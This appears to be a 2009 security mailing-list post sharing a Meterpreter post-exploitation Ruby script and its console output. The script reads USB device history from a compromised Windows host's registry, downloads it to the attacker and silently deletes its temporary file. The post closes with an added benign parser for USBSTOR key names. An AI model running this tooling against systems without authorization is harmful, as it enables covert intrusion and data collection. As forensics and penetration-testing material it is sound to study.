Here is a Meterpreter script to pull the USB devices from the registry.
A few issues in saving the output to a text file on the target before
downloading it; I think it's the \n that I'm adding. If anyone has any tips I'm
all ears.
As well, the output on the Meterpreter screen will be:
[code]
run installedusb
[*] New session on 192.168.0.50:43304...
[*] -- Files saved to C:\Documents and Settings\user\Application Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964...
[*] -- Data logged to C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
[*] Dumping software installed on pc per registry HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR...
[*]
========================================================================================================================
* Friendly Name : Apple iPod USB Device
- Class : DiskDrive
- DeviceDesc : Disk drive
- HardwareID : USBSTOR\DiskApple___iPod____________1.62?USBSTOR\DiskApple___iPod____________?USBSTOR\DiskApple___?USBSTOR\Apple___iPod____________1?Apple___iPod____________1?USBSTOR\GenDisk?GenDisk??
[*] -- Downloading C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
[*] -- C:\Documents and Settings\user\Application Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964\installedusb.txt downloaded!
[*] ...Done!!
[*] Completed processing on 192.168.0.50:43304...
[/code]
[code]
#
# This is a Meterpreter script designed to be used by the Metasploit Framework
#
# Meterpreter script for pulling forensics data from registry for any USB device
# connected to system
#
# Provided by Dimitrios Kapsalis
# Version: 0.1
require 'fileutils'
# ====================================================================================================================================
# Append a message to a file on the target
# ====================================================================================================================================
# Written through the Meterpreter file API instead of "cmd /c echo #{message} >> #{file}":
# echo stops at the first newline inside the message, and cmd interprets characters
# such as ?, *, < and > that occur in HardwareID strings, which is why the text file
# on the target came out wrong.
def m_writetofile(session, file, message)
  message += "\n" unless message.end_with?("\n")
  fd = session.fs.file.new(file, "ab")
  fd.write(message)
  fd.close
end
# ====================================================================================================================================
# Delete a file (meterpreter has no unlink API yet)
# ====================================================================================================================================
def m_unlink(session, path)
  r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
  # Wait for the command to finish before returning
  while (r.name)
    select(nil, nil, nil, 0.10)
  end
  r.close
end
# ====================================================================================================================================
# Exec a command and return the results
# ====================================================================================================================================
def m_exec(session, cmd)
  begin
    r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
    b = ""
    while (d = r.channel.read)
      b << d
    end
    r.channel.close
    r.close
    b
  rescue ::Exception => e
    print_status("Error Running Command #{cmd}: #{e.class} #{e}")
  end
end
# ====================================================================================================================================
# Function to upload files
# ====================================================================================================================================
def m_upload(session, file)
  location = session.fs.file.expand_path("%temp%")
  fileontrgt = "#{location}\\#{rand(100)}.exe"
  print_status("\t-- Uploading #{file}....")
  session.fs.file.upload_file("#{fileontrgt}", "#{file}")
  print_status("\t-- #{file} uploaded!")
  print_status("\t-- File on target #{fileontrgt}")
  return fileontrgt
end
# ====================================================================================================================================
# Function to download files
# ====================================================================================================================================
def m_download(session, src, dst)
  print_status("\t-- Downloading #{src}....")
  session.fs.file.download_file("#{dst}", "#{src}")
  print_status("\t-- #{dst} downloaded!")
end
# ====================================================================================================================================
# Read one registry value; not every USBSTOR instance carries every value
# (FriendlyName in particular is often absent), and query_value raises when
# the value is missing, which would abort the whole dump
# ====================================================================================================================================
def m_regvalue(rk, name)
  rk.query_value(name).data
rescue ::Exception
  "(not set)"
end
# ====================================================================================================================================
# Script proper
# ====================================================================================================================================
# The 'client' object holds the Meterpreter session
# Aliasing here for plugin compatibility
session = client
script_name = "installedsoftware"
# Extract the host and port
host, port = session.tunnel_peer.split(':')
print_status("New session on #{host}:#{port}...")
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs', script_name,
                   host + "_" + Time.now.strftime("%Y%m%d.%M%S") + sprintf("%.5d", rand(100000)))
::FileUtils.mkdir_p(logs)
print_status("-- Files saved to #{logs}...")
location = session.fs.file.expand_path("%temp%")
filename = "#{rand(100)}.dat"
fileontrgt = "#{location}\\#{filename}"
print_status("-- Data logged to #{fileontrgt}....")
begin
  #===========================================================================================
  # Dump USB device history
  #===========================================================================================
  key = "HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR"
  root_key, base_key = session.sys.registry.splitkey(key)
  separator = "---------------------------------------------------------------------"
  m_writetofile(session, fileontrgt, separator)
  message = "Dumping software installed on pc per registry #{key}... "
  print_status(message)
  m_writetofile(session, fileontrgt, message)
  m_writetofile(session, fileontrgt, separator)
  # Open the keys read-only with open_key: create_key would create any key that
  # is missing, modifying the registry this script is supposed to collect from.
  # Each sub-key of USBSTOR is one device model; each sub-key below that is one
  # device instance, named by the serial number the device reported.
  usbstor = session.sys.registry.open_key(root_key, base_key, KEY_READ)
  usbstor.each_key do |device|
    print_status("Device: #{device}")
    dev = session.sys.registry.open_key(root_key, "#{base_key}\\#{device}", KEY_READ)
    dev.each_key do |instance|
      print_status("Instance: #{instance}")
      rk = session.sys.registry.open_key(root_key, "#{base_key}\\#{device}\\#{instance}", KEY_READ)
      cl           = m_regvalue(rk, "Class")
      deviceDesc   = m_regvalue(rk, "DeviceDesc")
      friendlyName = m_regvalue(rk, "FriendlyName")
      hardwareID   = m_regvalue(rk, "HardwareID")
      rk.close
      message = "\n========================================================================================================================\n" <<
        " * Friendly Name : #{friendlyName}\n" <<
        " - Class : #{cl}\n" <<
        " - DeviceDesc : #{deviceDesc}\n" <<
        " - HardwareID : #{hardwareID}\n"
      print_status(message)
      m_writetofile(session, fileontrgt, message)
    end
    dev.close
  end
  usbstor.close
  #===========================================================================================
  # download output file
  #===========================================================================================
  m_download(session, fileontrgt, "#{logs}\\installedusb.txt")
  sleep(3)
  #===========================================================================================
  # delete the output file from the target system
  #===========================================================================================
  m_unlink(session, fileontrgt)
  print_status("...Done!!")
rescue ::Exception => e
  print_status("Exception: #{e.class} #{e} #{e.backtrace}")
end
print_status("Completed processing on #{host}:#{port}...")
[/code]
On Fri, Aug 14, 2009 at 12:57 PM, Dave Hull <[email protected]> wrote:
> The user assist keys are ROT13 encoded!
>
> There's just so much good stuff. Volume shadow copies and restore
> points too. And the list goes on...
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
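As an added example, not code from the original post or from Metasploit: a small Ruby parser that turns the USBSTOR key names and instance ids the script enumerates, together with the REG_MULTI_SZ HardwareID value, into records an analyst can compare across hosts. The key-name layout and the NUL-separated HardwareID format are standard Windows behaviour; the sample registry entries are constructed.

```ruby
# Added example (not from the original post or Metasploit): structure the values
# the script walks under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR.
#
# Sub-keys of USBSTOR are named <Type>&Ven_<vendor>&Prod_<product>&Rev_<revision>,
# and each holds one sub-key per device instance, named by the serial number the
# device reported plus an "&<n>" suffix. When the device reported no serial,
# Windows makes up an instance id whose second character is '&'; such an id is
# unique only on the host that generated it, so it cannot be matched across hosts.
# HardwareID is REG_MULTI_SZ: NUL-separated strings ending in a double NUL, which
# the console output in the post shows as '?' characters.

USBSTOR_KEY = /\A(?<type>[^&]+)&Ven_(?<vendor>[^&]*)&Prod_(?<product>[^&]*)&Rev_(?<rev>[^&]*)\z/

# Returns a hash for one device instance, or nil if the key is not a USBSTOR model key
def parse_usbstor_instance(key_name, instance_id)
  m = USBSTOR_KEY.match(key_name)
  return nil unless m
  {
    type: m[:type], vendor: m[:vendor], product: m[:product], revision: m[:rev],
    serial: instance_id.sub(/&\d+\z/, ''),   # strip the trailing "&<n>" suffix
    host_generated_id: instance_id[1] == '&'  # true: device supplied no serial
  }
end

# Split a raw REG_MULTI_SZ value (NUL separators, double NUL terminator) into strings
def split_multi_sz(data)
  data.b.split("\x00").reject(&:empty?)
end

# Constructed sample mirroring the key layout the script enumerates
SAMPLE_USBSTOR = {
  'Disk&Ven_Apple&Prod_iPod&Rev_1.62'     => ['000A270019A43A1B&0'],
  'Disk&Ven_SanDisk&Prod_Cruzer&Rev_8.02' => ['7&1a2b3c4d&0&000000'],
}

# Flatten a { model_key => [instance_ids] } tree into one record per instance
def usbstor_report(tree)
  tree.flat_map { |key, ids| ids.map { |id| parse_usbstor_instance(key, id) }.compact }
end

if __FILE__ == $0
  usbstor_report(SAMPLE_USBSTOR).each { |rec| puts rec.inspect }
end
```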